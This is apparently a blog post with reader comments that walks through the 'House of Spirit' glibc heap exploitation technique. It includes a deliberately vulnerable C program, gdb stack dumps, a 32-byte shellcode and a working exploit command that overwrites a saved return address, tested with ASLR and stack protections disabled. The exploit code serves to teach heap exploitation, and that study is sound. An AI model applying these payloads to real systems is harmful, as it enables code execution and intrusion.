The last technique from the “Malloc Maleficarum” is different from all the others because, among the requirements, there’s a stack overflow.
THE HOUSE OF SPIRIT
Ingredients:
- The attacker can control a memory location higher than the one he’s trying to change: the exact location depends on the fake size of the chunk being freed (see third point)
- A stack overflow that allows overwriting a variable containing a chunk address returned by a malloc() call
- The aforementioned chunk is freed
- Another chunk is allocated
- The attacker can control the content of this last chunk
So, for the first time, the main goal is not to overwrite the metadata of an allocated chunk, but to control the argument passed to its subsequent free() call. The result of this operation is that an arbitrary address gets linked into a fastbin. A later malloc() call of the matching size then returns that address as a chunk of memory: if the attacker can write into this area, he’ll be able to overwrite values that are important for the execution flow.
The problem, now, is to decide what this pointer should be overwritten with. To pass as a chunk, the target needs a plausible size field (which is located 4 bytes before the pointer value on 32-bit). Also, as it needs to trigger the fastbin code, the size must be no larger than av->max_fast (set to 64 + 8 by default) AND equal to the normalized size that the following malloc() will request (i.e. the malloc’s argument plus 4 bytes of overhead, rounded up to a multiple of 8: malloc(40) becomes 48). Finally, the stored return address (or whatever else we’d like to overwrite) needs to be located no more than 64 bytes away from this size field.
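As a rough sketch of the size arithmetic above, the following Python snippet mirrors glibc's request2size macro for a 32-bit build. The constants (SIZE_SZ = 4, 8-byte alignment, MINSIZE = 16) are assumed for i386, and the Python helpers only echo the glibc macro names; they are illustrative and not part of any library.

```python
# Sketch of 32-bit glibc chunk-size normalization (values assumed for i386).
SIZE_SZ = 4                          # sizeof(size_t) on 32-bit
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # 8-byte alignment -> mask 0x7
MINSIZE = 16                         # smallest possible chunk on 32-bit


def request2size(req):
    """Return the chunk size that malloc(req) is normalized to."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


# Default fastbin limit: request2size(64), i.e. the "64 + 8" mentioned above.
MAX_FAST = request2size(64)


def is_fastbin_size(size):
    """True if a chunk of this size would take the fastbin path in free()."""
    return size <= MAX_FAST


if __name__ == "__main__":
    for req in (40, 64, 256):
        size = request2size(req)
        kind = "fastbin" if is_fastbin_size(size) else "not fastbin"
        print(req, "->", size, kind)
```

Under these assumptions, a malloc(40) request normalizes to 48, which is therefore the value a fake size field has to carry for that request to pick the fake chunk.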
Once free() is called, the following code (glibc 2.3.5 line #3368) is executed:
    void
    public_fREe(Void_t* mem)
    {
      mstate ar_ptr;
      mchunkptr p;                          /* chunk corresponding to mem */
      [...]
      p = mem2chunk(mem);

    #if HAVE_MMAP
      if (chunk_is_mmapped(p))              /* release mmapped memory. */
      {
        munmap_chunk(p);
        return;
      }
    #endif

      ar_ptr = arena_for_chunk(p);
      [...]
      _int_free(ar_ptr, mem);
In this context, mem is the value we overwrote, which mem2chunk turns into a pointer to the (fake) chunk. To proceed, the size field must have neither the IS_MMAPPED nor the NON_MAIN_ARENA bit set. In that case, the _int_free function is called:
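The flag test described above can be sketched in a few lines of Python. The bit values are the ones glibc uses for the low bits of the size field; the helper names mirror the glibc macros but the functions themselves, including passes_public_free, are only illustrative.

```python
# Low bits of the size field are flags (32-bit glibc layout assumed).
PREV_INUSE = 0x1
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4
SIZE_BITS = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
SIZE_SZ = 4


def mem2chunk(mem):
    """Chunk header address for a user pointer: two size_t words earlier."""
    return mem - 2 * SIZE_SZ


def chunksize(size_field):
    """Size with the three flag bits masked out."""
    return size_field & ~SIZE_BITS


def passes_public_free(size_field):
    """Hypothetical helper: True if neither IS_MMAPPED nor NON_MAIN_ARENA is set."""
    return not (size_field & (IS_MMAPPED | NON_MAIN_ARENA))


if __name__ == "__main__":
    for field in (0x30, 0x31, 0x32, 0x34):
        print(hex(field), chunksize(field), passes_public_free(field))
```

A fake size such as 0x30 (or 0x31, with only PREV_INUSE set) goes straight to _int_free, while 0x32 would be treated as an mmapped chunk and 0x34 would make free() look for a non-main arena.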
    void
    _int_free(mstate av, Void_t* mem)
    {
      mchunkptr       p;           /* chunk corresponding to mem */
      INTERNAL_SIZE_T size;        /* its size */
      mfastbinptr*    fb;          /* associated fastbin */
      [...]
      p = mem2chunk(mem);
      size = chunksize(p);
      [...]
      /*
        If eligible, place chunk on a fastbin so it can be found
        and used quickly in malloc.
      */

      if ((unsigned long)(size) <= (unsigned long)(av->max_fast)

    #if TRIM_FASTBINS
          /*
            If TRIM_FASTBINS set, don't place chunks
            bordering top into fastbins
          */
          && (chunk_at_offset(p, size) != av->top)
    #endif
          ) {

        if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
            || __builtin_expect (chunksize (chunk_at_offset (p, size))
                                 >= av->system_mem, 0))
          {
            errstr = "free(): invalid next size (fast)";
            goto errout;
          }
        [...]
        fb = &(av->fastbins[fastbin_index(size)]);
        [...]
        p->fd = *fb;
        *fb = p;
      }
In this segment of code, if the size field is small enough (no larger than av->max_fast), the fastbin code is triggered. As you can see, there’s also that suspicious if that checks the size of the chunk next to the one we’re freeing: it must be larger than 2 * SIZE_SZ (8 bytes here) and smaller than av->system_mem. As the fake chunk’s size must be big enough to include the stored return address (or whatever else we’re trying to overwrite), the size field of the chunk next to the fake one lies beyond the location of the stored return address. This is why the attacker needs to control memory at a higher address than the target.
If everything goes fine, the fake chunk’s address is put into a fastbin and the next malloc() request whose normalized size matches the fake size we set will return it, allowing the attacker to do his job.
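The push in _int_free (p->fd = *fb; *fb = p) and the matching pop in malloc can be pictured with a small toy model. This is only a sketch: the ToyArena class and its dictionaries are invented for illustration, the 32-bit fastbin_index formula is assumed, and the addresses in the demo are arbitrary.

```python
# Toy model of the fastbin push in _int_free and the pop in malloc
# (32-bit layout assumed; the class and its names are illustrative).
SIZE_SZ = 4


def fastbin_index(size):
    """Index of the fastbin serving chunks of this size (32-bit)."""
    return (size >> 3) - 2


class ToyArena:
    def __init__(self):
        self.fastbins = {}   # index -> address of first free chunk (or None)
        self.fd = {}         # chunk address -> next chunk in the list

    def free(self, mem, size):
        """Link the chunk in front of its fastbin: p->fd = *fb; *fb = p."""
        p = mem - 2 * SIZE_SZ
        idx = fastbin_index(size)
        self.fd[p] = self.fastbins.get(idx)
        self.fastbins[idx] = p

    def malloc(self, size):
        """Pop the first chunk of the matching fastbin (size already normalized)."""
        idx = fastbin_index(size)
        p = self.fastbins.get(idx)
        if p is None:
            return None      # the real allocator would fall back to other bins
        self.fastbins[idx] = self.fd.pop(p)
        return p + 2 * SIZE_SZ


if __name__ == "__main__":
    arena = ToyArena()
    arena.free(0xBFFF0008, 48)        # arbitrary "stack" pointer with fake size 48
    print(hex(arena.malloc(48)))      # the same pointer comes back
```

The model leaves out every sanity check; it only shows that whatever pointer reaches the fastbin is what the next same-size request gets back.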
As usual, blackngel, in his “Malloc Des-Maleficarum”, provides an example that perfectly matches the requirements:
    /*
     * blackngel's vulnerable program slightly modified by gb_master
     */
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    void fvuln(char *str1, int age)
    {
        char *ptr1, name[32];
        int local_age;
        char *ptr2;

        local_age = age;

        ptr1 = (char *) malloc(256);
        printf("\nPTR1 = [ %p ]", ptr1);
        strcpy(name, str1);
        printf("\nPTR1 = [ %p ]\n", ptr1);

        free(ptr1);

        ptr2 = (char *) malloc(40);

        snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
        printf("\n%s\n", ptr2);
    }

    int main(int argc, char *argv[])
    {
        int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};

        if (argc == 3)
            fvuln(argv[1], atoi(argv[2]));

        return 0;
    }
It’s clear that the strcpy into name with user-controlled input allows overwriting the value of ptr1. Then, at the end, snprintf lets the attacker write into ptr2 and complete the exploit. About the modifications I made:
- I don’t know why blackngel declared both ptr1 and name as static. Anyway, I removed the attribute, as I was not comfortable with having these variables in the .bss area.
- The pad into the main function is required for two reasons:
- Allow a correct 8-byte alignment for the fake chunk ptr1
- Have a valid size value for the next chunk check in the free (I actually tried a smaller pad, but then ptr1’s value ended with \x20, a space character, on my machine and I was unable to pass that byte in the payload)
In order to have everything working, I had to:
- Disable ASLR with the usual echo command
- Boot the kernel with the noexec=off parameter
- Disable GCC’s stack protections
About the third point, it all reduces to:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
So, the first thing to do is to overwrite ptr1’s value. For the age parameter I will use the same value blackngel used in the original paper (48). Now we need a good value for ptr1.
    $ ./hos `python -c 'import sys; sys.stdout.write("A" * 32 + "B" * 4 + "C" * 4)'` 48
    PTR1 = [ 0x804b008 ]
    PTR1 = [ 0x43434343 ]
    Segmentation fault
Right after the strcpy the stack looks like this:
    (gdb) x/40x 0xffffcef0
    0xffffcef0: 0x00000000 0xffffcf60 0x08048625 0x41414141
    0xffffcf00: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffffcf10: 0x41414141 0x41414141 0x41414141 0x42424242
    0xffffcf20: 0x43434343 0x00000000 0xffffcf68 0x080486c0
    0xffffcf30: 0xffffd19e 0x00000030 0x00000000 0x00000000
    0xffffcf40: 0x00000000 0x00000000 0x00000000 0x00000000
    0xffffcf50: 0x00000000 0x0000000a 0x00000000 0x00000000
    0xffffcf60: 0xf7e5d000 0x00000000 0x00000000 0xf7cdd943
    0xffffcf70: 0x00000003 0xffffd004 0xffffd014 0xf7feb05e
    0xffffcf80: 0x00000003 0xffffd004 0xffffcfa4 0x0804a014

    PTR1      -> 0xFFFFCF20
    PTR2      -> 0xFFFFCF1C (??)
    local_age -> 0xFFFFCF24 (sadly overwritten with a NUL character)
    EBP       -> 0xFFFFCF28
    RET       -> 0xFFFFCF2C
    name      -> 0xFFFFCEFC
I don’t know how or why GCC decided to put ptr2 between name and ptr1, but this doesn’t change things much. OK, so ptr1 needs to be set to the address of local_age + 4 (0xFFFFCF28): this way, the chunk’s address will be 0xFFFFCF20 and its size field will sit right where local_age is stored. We also need to rewrite local_age with its proper value (48 in this scenario), as the strcpy destroyed it by writing the string terminator there.
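The address arithmetic can be replayed on the values from the dump. The snippet below is a sketch under the assumptions of this particular gdb session: 32-bit words, local_age restored to 0x30, and the 0x0000000a word at 0xFFFFCF54 taken to be the 10 stored in main's pad array.

```python
# Worked arithmetic on the stack dump above (32-bit; addresses from the gdb session).
SIZE_SZ = 4

stack = {                 # address -> 32-bit word, once local_age is restored
    0xFFFFCF24: 0x30,     # local_age, reused as the fake chunk's size field
    0xFFFFCF54: 0x0A,     # assumed to be pad[7] in main(): the next chunk's size
}

ptr1 = 0xFFFFCF28                     # value written over ptr1
chunk = ptr1 - 2 * SIZE_SZ            # mem2chunk(ptr1)
size_addr = chunk + SIZE_SZ           # the size field follows prev_size
size = stack[size_addr] & ~0x7        # chunksize(): flag bits masked out
next_chunk = chunk + size             # chunk_at_offset(p, size)
next_size = stack[next_chunk + SIZE_SZ]

# Lower bound of the "invalid next size (fast)" check. The upper bound
# (av->system_mem) is not modeled: its runtime value is not in the dump.
next_size_ok = next_size > 2 * SIZE_SZ

if __name__ == "__main__":
    print(hex(chunk), hex(size_addr), size, hex(next_chunk), next_size, next_size_ok)
```

With a fake size of 48 the next chunk starts at 0xFFFFCF50, so the word checked by free() is the one at 0xFFFFCF54, and 10 is just above the 8-byte minimum.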
So, the new command line will look like this:
./hos `python -c 'import sys; sys.stdout.write("A" * 32 + "B" * 4 + "\x28\xCF\xFF\xFF" + "\x30")'` 48
Once ptr1 holds 0xFFFFCF28, free() links the fake chunk into a fastbin and the following malloc(40) returns 0xFFFFCF28, which is assigned to ptr2. As the return address is stored at 0xFFFFCF2C, this means that bytes 4-7 of name (the variable that snprintf copies into ptr2) need to be set to the desired return address: in our case it’s the beginning of a shellcode stored inside the name variable itself (i.e. the address of name: 0xFFFFCEFC).
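The layout of the first argument can be written down explicitly. The following Python 3 sketch (the one-liners in this post are Python 2 style) uses struct.pack for the little-endian pointer; the build_argument helper and the placeholder name are hypothetical, and all addresses are the ones from the gdb session, so they only hold for that exact environment.

```python
import struct

NAME_LEN = 32                 # char name[32] in fvuln()
PTR1_VALUE = 0xFFFFCF28       # &local_age + 4, taken from the gdb session
NEW_RET = 0xFFFFCEFC          # address of name, where the shellcode will sit
FAKE_SIZE = 0x30              # 48, the normalized size of malloc(40)


def build_argument(name_bytes):
    """Lay out argv[1]: name[32] | ptr2 filler | ptr1 | low byte of local_age."""
    if len(name_bytes) != NAME_LEN or b"\x00" in name_bytes:
        raise ValueError("name must be exactly 32 bytes and contain no NUL")
    return (name_bytes
            + b"B" * 4                        # lands on ptr2 (reassigned by malloc later)
            + struct.pack("<I", PTR1_VALUE)   # little-endian overwrite of ptr1
            + bytes([FAKE_SIZE]))             # strcpy's NUL terminator follows


# Placeholder name: bytes 4-7 carry the new return address, the rest is filler.
name = b"AAAA" + struct.pack("<I", NEW_RET) + b"A" * 24
arg = build_argument(name)

# snprintf() copies name to ptr2 == 0xFFFFCF28: offset 0 hits the saved EBP,
# offset 4 hits the stored return address.
ret_slot = PTR1_VALUE + 4

if __name__ == "__main__":
    print(arg.hex(), hex(ret_slot))
```

Only the low byte of local_age is supplied: strcpy's terminator zeroes the second byte and the upper bytes are already zero, since age was 48 to begin with.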
As the space inside the name array is very small for my good-old “Pwned!” shellcode, I had to shrink it and adapt to this scenario. Sadly, I had to shorten the printed string to a simple “Pwn”.
    section .text
    global _start

    _start:
        xor eax, eax
        jmp tricky_end
        db 0xFC, 0xCE, 0xFF, 0xFF ; the new RET value

    tricky_start:
        mov al, 4
        xor ebx, ebx
        inc ebx
        pop ecx
        xor edx, edx
        mov dl, 3
        int 0x80
        mov al, 1
        int 0x80

    tricky_end:
        call tricky_start
        db 'Pwn'
    $ objdump -d pwn -M intel

    pwn:     file format elf32-i386

    Disassembly of section .text:

    08048080 <_start>:
     8048080:  31 c0              xor    eax,eax
     8048082:  eb 14              jmp    8048098 <tricky_end>
     8048084:  fc                 cld
     8048085:  ce                 into
     8048086:  ff                 (bad)
     8048087:  ff b0 04 31 db 43  push   DWORD PTR [eax+0x43db3104]

    08048088 <tricky_start>:
     8048088:  b0 04              mov    al,0x4
     804808a:  31 db              xor    ebx,ebx
     804808c:  43                 inc    ebx
     804808d:  59                 pop    ecx
     804808e:  31 d2              xor    edx,edx
     8048090:  b2 03              mov    dl,0x3
     8048092:  cd 80              int    0x80
     8048094:  b0 01              mov    al,0x1
     8048096:  cd 80              int    0x80

    08048098 <tricky_end>:
     8048098:  e8 eb ff ff ff     call   8048088 <tricky_start>
     804809d:  50                 push   eax
     804809e:  77 6e              ja     804810e <tricky_end+0x76>
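As a sanity check on the listing, the two relative branches and the embedded return address can be decoded by hand. This Python 3 sketch copies the 32 bytes from the objdump output; the two decoder helpers are hypothetical and handle only the 0xEB and 0xE8 opcodes used here.

```python
import struct

# Bytes copied from the objdump listing above; 0x08048080 is merely the load
# address of the standalone test binary.
BASE = 0x08048080
code = bytes.fromhex(
    "31c0" "eb14" "fcceffff"
    "b004" "31db" "43" "59" "31d2" "b203" "cd80" "b001" "cd80"
    "e8ebffffff" "50776e"
)


def short_jmp_target(code, off, base=BASE):
    """Target of a 2-byte 'jmp rel8' (opcode 0xEB) located at offset off."""
    assert code[off] == 0xEB
    rel = struct.unpack_from("<b", code, off + 1)[0]
    return base + off + 2 + rel


def near_call_target(code, off, base=BASE):
    """Target of a 5-byte 'call rel32' (opcode 0xE8) located at offset off."""
    assert code[off] == 0xE8
    rel = struct.unpack_from("<i", code, off + 1)[0]
    return base + off + 5 + rel


if __name__ == "__main__":
    print(len(code), "bytes")
    print("jmp  ->", hex(short_jmp_target(code, 2)))
    print("call ->", hex(near_call_target(code, 24)))
    print("RET  ->", hex(struct.unpack_from("<I", code, 4)[0]))
```

Both branches are relative, so the code behaves the same once copied into name on the stack. It is exactly 32 bytes long with no NUL byte, and bytes 4-7 hold 0xFFFFCEFC, which the jmp skips over.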
Putting it all together, we get the expected result:
    $ ./hos `python -c 'import sys; sys.stdout.write("\x31\xc0\xeb\x14\xfc\xce\xff\xff\xb0\x04\x31\xdb\x43\x59\x31\xd2\xb2\x03\xcd\x80\xb0\x01\xcd\x80\xe8\xeb\xff\xff\xff\x50\x77\x6e" + "B" * 4 + "\x28\xCF\xFF\xFF" + "\x30")'` 48
    PTR1 = [ 0x804b008 ]
    PTR1 = [ 0xffffcf28 ]
    1�������1�CY1Ҳ̀�̀�����Pwn(���(�
    Pwn$
And that’s actually it: the House of Spirit. This post concludes my trip into the paper that introduced glibc’s heap overflows to the world. I showed how some of the tricks described in it still work nowadays. It has been a lot of fun for me, and I really hope you had some too while reading all this stuff.
See you soon, guys…
I also set PTR1 to the value of ‘local_age + 4’, but it doesn’t work. I got an error: *** Error free(): invalid pointer: 0xffffd47c ***. Could you tell me how to fix this?
Well, I don’t have many details about your scenario. Did you check the memory layout? Was it the same as mine?
Hello,
With ASLR on amd64, is it possible to overwrite only the 12 least significant bits of the pointer? Those bits give the offset within a page and don’t vary despite ASLR, so by modifying only them it’s possible to know which function in the executable will be called.
Also, is there another exploit that works by consecutively calling free on 2 overflowed values? (though overflowing the second is optional)
Hello, sadly I don’t have (yet) much experience on 64b/ASLR scenarios, so I’m not quite able to answer your question. But, if you can, please let me know about your findings 🙂
It’s unrelated to ASLR: instead of overwriting a function pointer completely, you overwrite the 12 least significant bits and leave the upper 52 bits unmodified (remember it’s little endian).
Or otherwise, do you have an idea for this scenario (32 bits or 64 bits, whatever the architecture is)?
struct ef *ef=malloc(sizeof(struct ef));
ef->buffer=malloc(first_user_controlled_value);
read(fd,ef->buffer,second_user_controlled_value);
ef->eb=malloc(third_user_controlled_value);
read(fd,ef->sb,fourth_user_controlled_value);
free(ef->fb);
free(ef->buffer);
close(fd);
free(ef);
Of course, the attacker fully controls the size of the file and its content.